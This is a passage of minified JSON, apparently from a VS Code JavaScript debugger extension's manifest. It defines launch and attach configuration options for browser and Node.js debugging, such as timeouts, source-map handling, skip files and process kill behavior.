debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"useWebView":{"default":false,"description":"When 'true', the debugger will treat the runtime executable as a host application that contains a WebView allowing you to debug the WebView script content.","type":"boolean"},"userDataDir":{"default":true,"description":"By default, the browser is launched with a separate user profile in a temp folder. Use this option to override it. Set to false to launch with your default user profile. A new browser can't be launched if an instance is already running from `userDataDir`.","type":["string","boolean"]},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}}},"configurationSnippets":[],"deprecated":"Please use type msedge instead","label":"Web App (Edge)","languages":["javascript","typescript","javascriptreact","typescriptreact","html","css","coffeescript","handlebars","vue"],"strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"pwa-msedge"},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"attach":{"properties":{"address":{"default":"localhost","description":"IP address or hostname the debugged browser is listening on.","type":"string"},"browserAttachLocation":{"default":null,"description":"Forces the browser to attach in one location. In a remote workspace (through ssh or WSL, for example) this can be used to attach to a browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"Port to use to remote debugging the browser, given as `--remote-debugging-port` when launching the browser.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":false,"markdownDescription":"Whether to reconnect if the browser connection is closed","type":"boolean"},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"targetSelection":{"default":"automatic","enum":["pick","automatic"],"markdownDescription":"Whether to attach to all targets that match the URL filter (\"automatic\") or ask to pick one (\"pick\").","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"useWebView":{"default":{"pipeName":"MyPipeName"},"description":"An object containing the `pipeName` of a debug pipe for a UWP hosted Webview2. This is the \"MyTestSharedMemory\" when creating the pipe \"\\\\.\\pipe\\LOCAL\\MyTestSharedMemory\"","properties":{"pipeName":{"type":"string"}},"type":"object"},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}},"launch":{"properties":{"address":{"default":"localhost","description":"When debugging webviews, the IP address or hostname the webview is listening on. Will be automatically discovered if not set.","type":"string"},"browserLaunchLocation":{"default":null,"description":"Forces the browser to be launched in one location. In a remote workspace (through ssh or WSL, for example) this can be used to open the browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"cleanUp":{"default":"wholeBrowser","description":"What clean-up to do after the debugging session finishes. Close only the tab being debug, vs. close the whole browser.","enum":["wholeBrowser","onlyTab"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":null,"description":"Optional working directory for the runtime executable.","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"default":{},"description":"Optional dictionary of environment key/value pairs for the browser.","type":"object"},"file":{"default":"${workspaceFolder}/index.html","description":"A local html file to open in the browser","tags":["setup"],"type":"string"},"includeDefaultArgs":{"default":true,"description":"Whether default browser launch arguments (to disable features that may make debugging harder) will be included in the launch.","type":"boolean"},"includeLaunchArgs":{"default":true,"description":"Advanced: whether any default launch/debugging arguments are set on the browser. The debugger will assume the browser will use pipe debugging such as that which is provided with `--remote-debugging-pipe`.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how browser processes are killed when stopping the session with `cleanUp: wholeBrowser`. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its 